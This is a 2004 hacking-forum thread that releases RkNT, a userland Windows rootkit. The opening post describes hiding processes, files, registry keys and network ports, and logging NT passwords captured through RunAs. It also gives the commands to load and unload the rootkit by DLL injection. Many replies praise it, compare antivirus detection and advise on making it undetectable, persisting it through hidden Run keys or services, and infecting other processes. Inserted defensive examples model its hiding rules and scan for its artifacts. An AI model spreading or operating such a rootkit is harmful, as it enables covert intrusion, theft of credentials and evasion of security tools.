|=----------=[ RkNT 1.0 : The Real NT Ring3 Infection ]=-----------=|
|=-----------------------------------------------------------------=|
|=------------=[ R-e-D of RedKod <r-e-d@redkod.com> ]=-------------=|
This rootkit can not only hide processes, files, directories, registry keys and connections, but also retrieve NT passwords and forbid the deletion of miscellaneous files, from Windows Explorer or from the MS-DOS command line (cmd.exe). Files and directories are hidden even from those Windows tools. They are also invisible to tlist.exe and WinTask PRO.
As for connections, note that every port number over 65400 and under 65499 cannot be seen in netstat.exe. ;]
You can retrieve NT passwords by using the RunAs feature. The rootkit hooks the function to catch the given password. The password list is available in the file "%systemrootdir%\winini.sys".
Very important: this rootkit runs completely in USERLAND (RING3); no kernel module is needed ;]. This type of rootkit is more robust and is not detected by current antivirus.
To compile RkNTLoad:
cd RkNTLoad
nmake
To load the rootkit (take care to use the full path to the rootkit binary):
c:\RkNT>RkNTLoad -p explorer.exe -d c:\RkNT\RkNT.dll -l
[*] explorer.exe => PID [1196]
[*] DLL: c:\RkNT\RkNT.dll
[*] Injecting the DLL.
    => DLL injected successfully.
Once the rootkit is running, every process, file, directory and registry key whose name begins with '_' (underscore) is hidden!
You can check whether it is running with this command:
C:\RkNT>RkNTLoad -p explorer.exe -m | find "RkNT"
0x00B60000 c:\RkNT\RkNT.dll
If you want to unload the rootkit, just proceed like this:
c:\RkNT>RkNTLoad -p explorer.exe -d c:\RkNT\RkNT.dll -u
[*] explorer.exe => PID [1196]
[*] Getting a handle to the loaded DLL.
    => DLL found at address 0x00B60000.
[*] Unloading the DLL...
    => DLL unloaded successfully.
For remarks or questions you can contact me at r-e-d[at]redkod.com or find me on the RedKod forum: http://www.redkod.com/phorum/
--
R-e-D, RedKod Team
r-e-d@redkod.com
http://www.redkod.com/
http://r-e-d.redkod.com/
GnuPG v1.0.6 (GNU/Linux) ID 0x4D572372
Use it for your str0's against those aggressive admins of these days! AND those F*KKING admins with rootkit detectors! Enjoy, peeps.
Tyrano
Jul 9 2004, 06:52 AM
Looks like it has some great features. Now, how do we detect it?
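Editor's added example (not RkNT code): the README's two hiding rules, names beginning with '_' and ports strictly between 65400 and 65499, modelled as the filter a hooked enumeration API applies, plus the cross-view check that answers the "how do we detect it" question. A userland hook can only filter the view of processes it has been injected into, so a listing taken from an uninjected process (or a raw on-disk read) still contains the hidden entries; diffing the two views exposes them. The sample listing below is constructed for the demo.

```c
#include <stdio.h>
#include <string.h>

#define MAX_ENTRIES 64

/* README rule: anything whose name begins with '_' is hidden
 * (files, directories, processes, registry keys). */
int rknt_hides_name(const char *name)
{
    return name != NULL && name[0] == '_';
}

/* README rule: "every port number over 65400 and under 65499"
 * is hidden from netstat.exe; both bounds are exclusive as written. */
int rknt_hides_port(unsigned port)
{
    return port > 65400 && port < 65499;
}

/* The view a hooked listing call hands back: the real list with the
 * name rule applied. Copies surviving pointers into out[], returns count. */
size_t rknt_view(const char *const *truth, size_t n, const char **out)
{
    size_t kept = 0;
    for (size_t i = 0; i < n; i++)
        if (!rknt_hides_name(truth[i]))
            out[kept++] = truth[i];
    return kept;
}

/* Cross-view diff: every entry in the trusted list that the hooked view
 * omitted. Returns the number hidden and writes them to hidden[]. */
size_t cross_view_diff(const char *const *trusted, size_t n_trusted,
                       const char *const *hooked, size_t n_hooked,
                       const char **hidden)
{
    size_t found = 0;
    for (size_t i = 0; i < n_trusted; i++) {
        int seen = 0;
        for (size_t j = 0; j < n_hooked && !seen; j++)
            seen = strcmp(trusted[i], hooked[j]) == 0;
        if (!seen)
            hidden[found++] = trusted[i];
    }
    return found;
}

/* Constructed sample listing (not taken from a real system). */
static const char *const sample[] = {
    "explorer.exe", "_RkNT.dll", "cmd.exe", "_backdoor.exe", "notepad.exe"
};
#define SAMPLE_N (sizeof sample / sizeof sample[0])

/* How many entries of the sample the hook removes from view. */
size_t hidden_in_sample(void)
{
    const char *view[MAX_ENTRIES], *hidden[MAX_ENTRIES];
    size_t n_view = rknt_view(sample, SAMPLE_N, view);
    return cross_view_diff(sample, SAMPLE_N, view, n_view, hidden);
}

int main(void)
{
    const char *view[MAX_ENTRIES], *hidden[MAX_ENTRIES];
    size_t n_view = rknt_view(sample, SAMPLE_N, view);
    size_t n_hidden = cross_view_diff(sample, SAMPLE_N, view, n_view, hidden);

    printf("hooked view (%zu entries):\n", n_view);
    for (size_t i = 0; i < n_view; i++)
        printf("  %s\n", view[i]);
    printf("hidden by the hook (%zu):\n", n_hidden);
    for (size_t i = 0; i < n_hidden; i++)
        printf("  %s\n", hidden[i]);

    unsigned ports[] = { 80, 65400, 65450, 65499 };
    for (size_t i = 0; i < sizeof ports / sizeof ports[0]; i++)
        printf("port %u: %s\n", ports[i],
               rknt_hides_port(ports[i]) ? "hidden" : "visible");
    return 0;
}
```

In practice the "trusted" list comes from somewhere the ring-3 hook does not reach: a process that was never injected, a remote session, or the raw directory and registry hives read offline. The same diff works for the port range: compare a local netstat against a scan from another host.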
popo0421
Jul 9 2004, 08:31 AM
Thanks for sharing this rootkit! I tested it and it works OK!
shiz
Jul 9 2004, 08:32 AM
F-Prot antivirus detects it right away upon starting the download.
shiz
Jul 9 2004, 08:43 AM
Oops, double-posted by accident.
Lanig
Jul 9 2004, 11:36 AM
Detected by KAV too... but it's open source, so it won't be hard to make it totally undetectable.
jhd
Jul 9 2004, 11:42 AM
Thanks for the share.
Killahbee
Jul 9 2004, 12:06 PM
Interesting, let me see.
h3llraz0r
Jul 9 2004, 01:27 PM
Looks great, thanks for the rootkit! Detected by F-Secure also.
Venom
Jul 9 2004, 09:54 PM
Don't be surprised... Not detected by McAfee as of now.
Can someone please translate the comments in the code to English?
jpno5
Jul 10 2004, 01:10 AM
Has anyone got this to work? I compiled it OK and ran it. The DLL loads, but it only hides folders and files; I can still view the processes and registry keys and see the connection in netstat.
blahplok
Jul 10 2004, 01:36 AM
Thanks for sharing this RK. Can anyone tell me where I can find the MS Blaster source code?
kenshin_efx
Jul 10 2004, 04:35 AM
Hmmm, thanks a lot for sharing your tools, man, I really appreciate that.
jockel
Jul 11 2004, 08:36 PM
Nice one... thanks for distributing the source along with it...
globey
Jul 11 2004, 10:36 PM
It's a nice r00tkit, dude. Thanks for that.
tibbar
Jul 12 2004, 07:23 AM
Well, that's very useful. Thanks.
By the way, use alternative compilers to make it undetected.
Mux99
Jul 12 2004, 12:02 PM
Hey, nice rootkit... with really nice options.
I will try to mod the source...
Thanks for sharing!
Jimbras
Jul 13 2004, 01:41 PM
Thanks for this. Gonna check it out.
michael
Jul 13 2004, 02:17 PM
OK... thanks for sharing. I tried it... it seems to work, but I don't get the "underline" thing... " _ " those should be invisible, but when I run fport I can still see my blabla.exe running, so I should rename my blabla.exe to _blabla.exe... right?
Am I doing something wrong here?!
winxpdll
Jul 13 2004, 05:16 PM
Awesome! Thanks a lot for distributing the source code... Please add this mod to simplify the configuration:
CODE
/* one place to change the hide prefix; a char, since it is compared against filename[0] */
#define HIDE_FILE_MASK '_'
.....
// mod: instead of  if (filename[0] == '_')
if (filename[0] == HIDE_FILE_MASK)
    return TRUE;
......
...or something like this.
[Z]castor
Jul 13 2004, 08:29 PM
Thanks for sharing that nice rootkit.
braini
Jul 14 2004, 07:52 AM
QUOTE (michael @ Jul 13 2004, 02:17 PM)
OK... thanks for sharing. I tried it... it seems to work, but I don't get the "underline" thing... " _ " those should be invisible, but when I run fport I can still see my blabla.exe running, so I should rename my blabla.exe to _blabla.exe... right?
Am I doing something wrong here?!
Or you just modify the source and compile a DLL for your needs / files....
Shouldn't be that hard.
predx
Jul 14 2004, 02:21 PM
Hey, thanks for posting this rootkit!!!
macca
Jul 14 2004, 11:38 PM
Thank you for this new piece of s/w, I will have something different to test out... much appreciated...
Also not reported by McAfee with the latest definitions.
globey
Jul 14 2004, 11:56 PM
Do I have to run the rootkit with this command?
CODE
RkNTLoad -p explorer.exe -d c:\RkNT\RkNT.dll -l
Or can I choose another -p? Like:
CODE
RkNTLoad -p GSO.exe -d c:\RkNT\RkNT.dll -l
or something like that?
And do I need to run the rootkit one time, or every time the computer is rebooted?
strohunter
Jul 15 2004, 12:47 AM
You can inject the DLL into every process you want and it will be rootkitted, but you will need to inject every process you want to be rootkitted. It's not very useful, is it? ^^
If you inject explorer.exe, each newly created process will be automatically injected, since a process is created by explorer.exe calling CreateProcessW from kernel32.dll; this function has of course been hooked to automatically inject each newly created process.
And yes, you will need to run the rootkit each time the computer reboots ^^
globey
Jul 15 2004, 10:16 AM
QUOTE (strohunter @ Jul 15 2004, 12:47 AM)
You can inject the DLL into every process you want and it will be rootkitted, but you will need to inject every process you want to be rootkitted. It's not very useful, is it? ^^
If you inject explorer.exe, each newly created process will be automatically injected, since a process is created by explorer.exe calling CreateProcessW from kernel32.dll; this function has of course been hooked to automatically inject each newly created process.
And yes, you will need to run the rootkit each time the computer reboots ^^
So it's not the best rootkit :\
Thanks for the answer.
strohunter
Jul 15 2004, 09:12 PM
QUOTE (globey @ Jul 15 2004, 10:16 AM)
So it's not the best rootkit :\
Thanks for the answer.
What?
Injecting the DLL into explorer.exe is the only (proper) way to have any process automatically rootkitted with a pure userland rootkit (well, as far as I know...); mine works in a very similar way.
About the *reboot* problem, it's just your job to make it a system service or a "run regkey", and it's not very difficult :s
braini
Jul 16 2004, 06:49 AM
QUOTE (strohunter @ Jul 15 2004, 09:12 PM)
About the *reboot* problem, it's just your job to make it a system service or a "run regkey", and it's not very difficult :s
Especially when you can hide registry keys ;]
strohunter
Jul 16 2004, 08:56 AM
QUOTE (braini @ Jul 16 2004, 06:49 AM)
QUOTE (strohunter @ Jul 15 2004, 09:12 PM)
About the *reboot* problem, it's just your job to make it a system service or a "run regkey", and it's not very difficult :s
Especially when you can hide registry keys ;]
Yep ^__^ (but I prefer a system service, to give the rootkit/backdoor NT AUTHORITY rights)
espey
Jul 16 2004, 01:13 PM
Big thanks, this r00tkit is very useful :]
passi
Jul 16 2004, 01:14 PM
Thanks for this one. Very interesting!
ANTITRUST
Jul 16 2004, 03:44 PM
Following my remote test, it functions very well. Thank you for this rootkit!
DougieShiney
Jul 18 2004, 06:04 PM
Cheers for the source; the code will be easy to change to make a non-detectable version.
t0bban
Jul 18 2004, 09:05 PM
I read about this somewhere... Seems to kick arse... Is it alright? Cheers.
z73
Jul 18 2004, 11:36 PM
This really looks like it kicks ass. Worth a try, thanks for sharing.
MxMx
Sep 12 2004, 07:43 AM
Hey peeps,
I've tried to compile it, but how do I do this?...
I've tried it with the RkNT.dll already in the package, but my folders beginning with _ are still visible.
Please help me.
Gargoyle
Sep 14 2004, 09:01 PM
I started the rootkit and injected explorer.exe, but I can still see folders or files with "_". explorer.exe seems not to be injected.
Started with RkNTLoad -p explorer.exe -d RkNT.dll -l
What can be the problem?
Many thanks.
tonikgin
Sep 15 2004, 10:57 PM
QUOTE
You can retrieve NT passwords by using the RunAs feature. The rootkit hooks the function to catch the given password. The password list is available in the file "%systemrootdir%\winini.sys".
The winini.sys file idea needs more thought put into it. The filename itself is suspicious, and also searching for the file could be used to detect the presence of this rootkit, since the filename is unique to this version.
I'm guessing this isn't an open source project?
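Editor's added example, not code from RkNT or anyone in this thread: a sweep for the artifacts the thread itself names, covering both strohunter's persistence suggestion (a service or a Run key, which braini notes can be hidden by giving it a name starting with '_') and tonikgin's point that %SystemRoot%\winini.sys is unique to this build. It assumes the stock names RkNT.dll, RkNTLoad and winini.sys and the '_' prefix; a rebuilt or renamed copy will not match these strings.

```powershell
# Sweep for the RkNT artifacts described in the thread (editor's example).
# Assumed indicators: RkNT.dll / RkNTLoad / winini.sys / the '_' prefix.
$findings = @()

# 1. Run keys: a "run regkey" is one persistence option named in the thread;
#    a value named '_something' would be hidden from regedit on the infected box.
$metaProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
$runKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
           'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
        if ($metaProps -contains $p.Name) { continue }
        if ($p.Name -like '_*' -or "$($p.Value)" -match 'RkNTLoad|RkNT\.dll') {
            $findings += "Run value '$($p.Name)' = $($p.Value)  [$key]"
        }
    }
}

# 2. Services: the other persistence option named, chosen to get SYSTEM rights.
foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    if ($svc.Name -like '_*' -or "$($svc.PathName)" -match 'RkNTLoad|RkNT\.dll') {
        $findings += "Service '$($svc.Name)' -> $($svc.PathName)"
    }
}

# 3. The RunAs password log the README documents at %SystemRoot%\winini.sys.
$log = Join-Path $env:SystemRoot 'winini.sys'
if (Test-Path -LiteralPath $log) {
    $size = (Get-Item -LiteralPath $log).Length
    $findings += "Password log present: $log ($size bytes)"
}

# 4. RkNT.dll loaded in explorer.exe, the same thing "RkNTLoad -p explorer.exe -m" prints.
foreach ($proc in Get-Process -Name explorer -ErrorAction SilentlyContinue) {
    try {
        foreach ($m in $proc.Modules) {
            if ($m.ModuleName -ieq 'RkNT.dll') {
                $base = '0x{0:X8}' -f $m.BaseAddress.ToInt64()
                $findings += "explorer.exe PID $($proc.Id) has $($m.FileName) at $base"
            }
        }
    } catch {
        Write-Warning "cannot read modules of PID $($proc.Id): $_"
    }
}

if ($findings.Count -eq 0) {
    Write-Output '[*] no RkNT artifacts found'
} else {
    $findings | ForEach-Object { Write-Output "[!] $_" }
}
```

Run it from a process that was not spawned by explorer.exe (a remote session or a scheduled task running as SYSTEM), otherwise the interpreter itself inherits the hook and any Run value or service whose name starts with '_' is filtered out of the registry and service enumerations before the script sees it. The winini.sys check survives even from an injected process, because that name does not start with '_' and so falls outside the hiding rule.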
crosis
Sep 16 2004, 06:13 AM
Wow, nice, thanks.
Sigmatador
Sep 16 2004, 12:14 PM
@Gargoyle: use the full path of the DLL (e.g. "c:\rknt.dll").
@tonikgin: GNU GPL, and well commented (in French).
@all: this release is a bunch of bugs, wait for the next release ^^
ivanchin99
Oct 2 2004, 10:39 AM
Guys... can anyone guide me in making this rootkit undetectable???
click
Oct 2 2004, 01:44 PM
Wow, thanks for the rootkit!
This should help me out quite a bit, especially with the source code. I am working on making a Metasploit payload set that includes rootkits, and a non-kernel-driver rootkit would be perfect!
Thanks for the excellent post
elbarto95
Oct 2 2004, 04:07 PM
thanks for sharing
Regards.
ivanchin99
Oct 3 2004, 09:06 AM
Guys... I need some guidance here... how do I make it, err, unique, undetectable...? Is it by disassembling it and reassembling it?? Do I need programming skills for this?
I'm new to this kind of thing...
devil666
Oct 5 2004, 07:39 PM
Thanks for the rootkit...
Will have a try
{$ fireburn $}
Oct 6 2004, 06:59 AM
For me this RK is not so bad, but hxdef is really better!!! For many things, like the disk size modification, and for the possibility to hide what we want, not only everything beginning with _,
because many EXEs aren't hex-editable, and so we can't modify their service name...
belgther
Oct 6 2004, 02:59 PM
But a rootkit means nothing if there's no shell server or something like that... or how does it work?
mogwai
Oct 7 2004, 01:53 PM
Interesting... yum yum, thanks for this software :]
perky
Oct 7 2004, 03:48 PM
Thanks, Very good ! :-)